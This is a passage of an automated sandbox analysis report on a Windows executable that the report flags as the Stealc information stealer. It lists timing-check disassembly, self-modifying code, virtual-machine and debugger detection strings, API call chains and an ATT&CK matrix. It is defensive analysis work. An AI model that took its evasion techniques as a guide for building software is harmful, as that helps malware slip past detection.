              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F2272 second address: 9F227F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FD9790E7D5Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3DB5 second address: 9F3DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F3DB9 second address: 9F3DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D65h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F5398 second address: 9F539C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8247 second address: 9F8251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8251 second address: 9F8288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979465342h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007FD979465367h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD979465347h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8288 second address: 9F82FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FD9790E7D58h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 and dl, FFFFFFE8h 0x00000027 push dword ptr [ebp+122D1D5Ch] 0x0000002d jmp 00007FD9790E7D5Ah 0x00000032 add edx, 714F8C65h 0x00000038 call 00007FD9790E7D59h 0x0000003d jmp 00007FD9790E7D60h 0x00000042 push eax 0x00000043 jc 00007FD9790E7D64h 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c pop edi 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F82FC second address: 9F8314 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD979465336h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FD979465338h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8314 second address: 9F835E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD9790E7D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FD9790E7D6Eh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 jc 00007FD9790E7D60h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9831 second address: 9F9837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9837 second address: 9F983B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F983B second address: 9F983F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507029A second address: 50702E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD9790E7D67h 0x0000000b xor cx, 1B6Eh 0x00000010 jmp 00007FD9790E7D69h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FD9790E7D5Dh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50702E9 second address: 507032E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 pushfd 0x00000006 jmp 00007FD979465343h 0x0000000b or si, E62Eh 0x00000010 jmp 00007FD979465349h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c mov ebx, ecx 0x0000001e pushad 0x0000001f push esi 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507038F second address: 50703D1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD9790E7D5Dh 0x00000008 sbb esi, 7BD59286h 0x0000000e jmp 00007FD9790E7D61h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FD9790E7D5Eh 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D1 second address: 50703D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703D5 second address: 50703DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703DB second address: 50703E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50703E1 second address: 50703E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 912841 second address: 91284A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 75F71D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 75F84F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 90E5DC instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 992E36 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27146
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005218A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005218A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00523910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00523910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00521269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00521269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00524B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00524B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00524B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0052CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00522390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00522390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0051DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005223A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005223A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0052D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0052DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005116B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005116B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005116A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_005116A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00531BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00531BF0
              Source: file.exe, file.exe, 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2082518165.0000000001202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl.
              Source: file.exe, 00000000.00000002.2082518165.0000000001202000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2082518165.00000000011D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25847
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25822
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25958
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25803
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25950
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514A60 VirtualProtect 00000000,00000004,00000100,?0_2_00514A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00536390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00536390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00536390 mov eax, dword ptr fs:[00000030h]0_2_00536390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00532A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00532A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5296, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00534610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00534610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005346A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_005346A0
              Source: file.exe, file.exe, 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: {Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00532D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00532B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00532B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00532A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00532A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00532C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00532C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5296, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2040482339.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2082518165.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5296, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
